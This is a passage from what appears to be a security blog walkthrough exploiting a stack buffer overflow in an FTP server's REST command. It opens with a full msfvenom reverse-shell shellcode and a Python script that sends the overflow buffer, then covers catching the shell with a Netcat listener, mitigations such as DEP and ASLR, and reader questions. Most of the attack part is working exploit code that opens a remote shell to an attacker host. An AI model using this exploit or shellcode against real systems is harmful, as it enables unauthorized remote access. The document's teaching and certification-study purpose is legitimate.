#msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.110 LPORT=443 -f py -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -v shellcode
shellcode = b""
shellcode += b"\xda\xda\xd9\x74\x24\xf4\xb8\x6c\x6d\x17\xbc"
shellcode += b"\x5b\x2b\xc9\xb1\x52\x31\x43\x17\x83\xeb\xfc"
shellcode += b"\x03\x2f\x7e\xf5\x49\x53\x68\x7b\xb1\xab\x69"
shellcode += b"\x1c\x3b\x4e\x58\x1c\x5f\x1b\xcb\xac\x2b\x49"
shellcode += b"\xe0\x47\x79\x79\x73\x25\x56\x8e\x34\x80\x80"
shellcode += b"\xa1\xc5\xb9\xf1\xa0\x45\xc0\x25\x02\x77\x0b"
shellcode += b"\x38\x43\xb0\x76\xb1\x11\x69\xfc\x64\x85\x1e"
shellcode += b"\x48\xb5\x2e\x6c\x5c\xbd\xd3\x25\x5f\xec\x42"
shellcode += b"\x3d\x06\x2e\x65\x92\x32\x67\x7d\xf7\x7f\x31"
shellcode += b"\xf6\xc3\xf4\xc0\xde\x1d\xf4\x6f\x1f\x92\x07"
shellcode += b"\x71\x58\x15\xf8\x04\x90\x65\x85\x1e\x67\x17"
shellcode += b"\x51\xaa\x73\xbf\x12\x0c\x5f\x41\xf6\xcb\x14"
shellcode += b"\x4d\xb3\x98\x72\x52\x42\x4c\x09\x6e\xcf\x73"
shellcode += b"\xdd\xe6\x8b\x57\xf9\xa3\x48\xf9\x58\x0e\x3e"
shellcode += b"\x06\xba\xf1\x9f\xa2\xb1\x1c\xcb\xde\x98\x48"
shellcode += b"\x38\xd3\x22\x89\x56\x64\x51\xbb\xf9\xde\xfd"
shellcode += b"\xf7\x72\xf9\xfa\xf8\xa8\xbd\x94\x06\x53\xbe"
shellcode += b"\xbd\xcc\x07\xee\xd5\xe5\x27\x65\x25\x09\xf2"
shellcode += b"\x2a\x75\xa5\xad\x8a\x25\x05\x1e\x63\x2f\x8a"
shellcode += b"\x41\x93\x50\x40\xea\x3e\xab\x03\x1f\xbf\xb3"
shellcode += b"\xbd\x77\xbd\xb3\x40\x33\x48\x55\x28\x53\x1d"
shellcode += b"\xce\xc5\xca\x04\x84\x74\x12\x93\xe1\xb7\x98"
shellcode += b"\x10\x16\x79\x69\x5c\x04\xee\x99\x2b\x76\xb9"
shellcode += b"\xa6\x81\x1e\x25\x34\x4e\xde\x20\x25\xd9\x89"
shellcode += b"\x65\x9b\x10\x5f\x98\x82\x8a\x7d\x61\x52\xf4"
shellcode += b"\xc5\xbe\xa7\xfb\xc4\x33\x93\xdf\xd6\x8d\x1c"
shellcode += b"\x64\x82\x41\x4b\x32\x7c\x24\x25\xf4\xd6\xfe"
shellcode += b"\x9a\x5e\xbe\x87\xd0\x60\xb8\x87\x3c\x17\x24"
shellcode += b"\x39\xe9\x6e\x5b\xf6\x7d\x67\x24\xea\x1d\x88"
shellcode += b"\xff\xae\x2e\xc3\x5d\x86\xa6\x8a\x34\x9a\xaa"
shellcode += b"\x2c\xe3\xd9\xd2\xae\x01\xa2\x20\xae\x60\xa7"
shellcode += b"\x6d\x68\x99\xd5\xfe\x1d\x9d\x4a\xfe\x37"
nops = "\x90" * 20 #NOP Slides
buffer = offset + EIP + nops + shellcode
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
    print "[*] Error in connection with server"
    sys.exit()
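The way the script assembles its buffer (padding, then the overwritten return address, then the NOP sled and the shellcode) can be sketched in isolation. The snippet below is a minimal Python 3 illustration rather than the exploit itself: the 230-byte offset, the 0x7734BC0D address and the four-byte placeholder payload are assumptions chosen for the example, and `build_buffer` is a hypothetical helper name.

```python
import struct

def build_buffer(offset_len, jmp_esp_addr, payload, nop_count=20):
    """Return padding + return address + NOP sled + payload as bytes."""
    padding = b"A" * offset_len            # filler up to the saved return address
    eip = struct.pack("<I", jmp_esp_addr)  # 32-bit address in little-endian order
    nops = b"\x90" * nop_count             # NOP sled in front of the payload
    return padding + eip + nops + payload

# Illustrative values only (assumptions, not taken from the target application)
buffer = build_buffer(230, 0x7734BC0D, b"\xcc" * 4)
print(len(buffer))            # 258 (230 + 4 + 20 + 4)
print(buffer[230:234].hex())  # 0dbc3477, the address stored in reverse byte order
```

Using `struct.pack("<I", ...)` avoids reversing the address bytes by hand, which is an easy place to make a mistake.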
Gaining Remote Access
Once the final exploit has been assembled, the next step is to set up a Netcat listener, which will catch our reverse shell when it is executed, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
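The flags above combine into a single command. As a minimal sketch, the Python 3 helper below builds that command line; the port 4444 is an assumption (use the port the shellcode was generated with) and `netcat_listener_args` is a hypothetical name. Some Netcat variants expect the port as a positional argument instead of `-p`, so the exact form may differ on your system.

```python
def netcat_listener_args(port):
    """Build the argument list for a Netcat listener on the given TCP port."""
    if not 0 < port < 65536:
        raise ValueError("port must be between 1 and 65535")
    # -l listen, -v verbose, -n skip DNS lookups, -p port to listen on
    return ["nc", "-l", "-v", "-n", "-p", str(port)]

args = netcat_listener_args(4444)  # 4444 is an assumed port
print(" ".join(args))              # nc -l -v -n -p 4444
```

The same flags are commonly written in their combined form, `nc -lvnp` followed by the port.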
Restarting the application, this time without Immunity Debugger:
Running the final Python exploit:
A callback was received and a reverse shell was granted as the “stef” user. The privileges granted by the exploit will always match those of the user who owns the process.
Other Buffer Overflow Examples
Stack buffer overflow is quite a difficult attack to learn, especially for those who are not proficient with assembly programming. In case this post by itself wasn’t enough to understand the steps required to exploit a stack buffer overflow vulnerability, below are some more exploitation walkthroughs that I published on this blog:
- Stack Buffer Overflow – Exploiting SLMail 5.5
- Vulnhub – Brainpan 1 Walkthrough
- Stack Buffer Overflow – Vulnserver Guide
- Stack Buffer Overflow – dostackbufferoverflowgood Guide
These are all performed against executables that are available online and have helped me greatly when preparing for the OSCP certification exam.
Conclusion
Stack Buffer Overflow is one of the oldest and most common vulnerabilities exploited by attackers to gain unauthorized access to vulnerable systems.
Several mitigations should be implemented to defend against it: control-flow integrity schemes to prevent redirection to arbitrary code, a non-executable stack (DEP/NX) to prevent execution of malicious code from the stack, and address space layout randomization (ASLR) to make it harder for attackers to find valid instruction addresses that jump to areas of memory containing malicious code.
Sources & Useful Links
- https://www.exploit-db.com/exploits/17548
- https://wiki.skullsecurity.org/index.php?title=The_Stack
- https://wiki.skullsecurity.org/index.php?title=Fundamentals
- https://wiki.skullsecurity.org/Registers
- https://wiki.skullsecurity.org/index.php?title=Simple_Instructions
- https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
- https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
- https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
- https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
Very good article, thanks for that! Question: wouldn’t it be okay to add EXITFUNC=thread to the shellcode in order to not crash the app after running the exploit?
I’m glad it was useful! Yes, that would be perfectly fine, especially in situations where causing the application to crash isn’t ideal.
You went through and determined the ESP had enough space for the program. How does this relate to the ESP space for the dll? Wouldn’t this be different?
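ESP points to the location on the stack where the shellcode is placed, whereas the DLL is only used as the source of a JMP ESP instruction: its address overwrites the saved return address that ends up in EIP, the register holding the address of the next instruction to execute. The space check therefore only concerns the stack area that ESP points to, not the DLL.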
Thanks! One thing I don’t get, why do you choose ntdll.dll when ASLR protects it?
Hi Markus,
That’s a great question! As far as I know, ASLR is meant to protect against buffer overflow attacks by randomizing the addresses at which executables, DLLs and other binaries are loaded into memory, so that attackers cannot rely on known addresses to redirect execution to malicious code.
Whether this is a good approach depends entirely on the number of bits used in the randomization process, and 32-bit applications remain a lot less secure even when ASLR is enabled because there are far fewer possible load addresses. In this specific case, even if ASLR were randomizing the memory location of modules and DLLs, the current location can still be found with a debugger and used as the JMP ESP address while the application is running. That address stops being valid once the module is loaded at a new randomized base (for Windows system DLLs this typically happens at reboot rather than on every application restart), which makes this type of attack much more difficult without being able to debug the application first, since the attacker would have to brute force all of the 256 possible memory locations. The author of the exploit used a hard-coded address for the KERNEL32 DLL, which makes me think this particular DLL is not well protected by ASLR, or at least not on Windows XP SP3, the version mentioned on Exploit-DB. That is consistent with Windows XP predating ASLR, which was only introduced with Windows Vista.
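To put the 256 possible locations into numbers, here is a rough Python 3 sketch. It assumes 8 bits of entropy and a uniformly random load address, and it compares two simplified models: trying each candidate once against a layout that stays fixed, and repeating one fixed guess against a layout that is re-randomized before every attempt. The function name and both models are illustrative assumptions, not measurements.

```python
def aslr_guess_odds(entropy_bits, attempts):
    """Return (slots, average tries if the layout is fixed, success odds if re-randomized)."""
    slots = 2 ** entropy_bits
    # Layout fixed between attempts: try each candidate once, on average (slots + 1) / 2 tries
    avg_sequential = (slots + 1) / 2
    # Layout re-randomized before every attempt: each try succeeds with probability 1 / slots
    p_within = 1.0 - (1.0 - 1.0 / slots) ** attempts
    return slots, avg_sequential, p_within

slots, avg_sequential, p_within = aslr_guess_odds(8, 256)
print(slots)               # 256
print(avg_sequential)      # 128.5
print(round(p_within, 2))  # chance of at least one hit in 256 re-randomized attempts
```

Either way the search space is small, which is why the number of randomized bits matters so much.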
Hope this was helpful!
Hi,
Did I understand correctly that we are overflowing the buffer (to overwrite EIP), but our shellcode does not go into the buffer? Instead it goes into the ESP register if there is enough space for it, and if not, we force ESP to jump to another register that can store our shellcode?
That’s exactly right! The only reason we overwrite EIP is to redirect execution to the memory a register points to, where the malicious code is stored. This is normally ESP, but when there isn’t enough space after it, we simply use that space to perform an additional jump to a register that points to a larger area.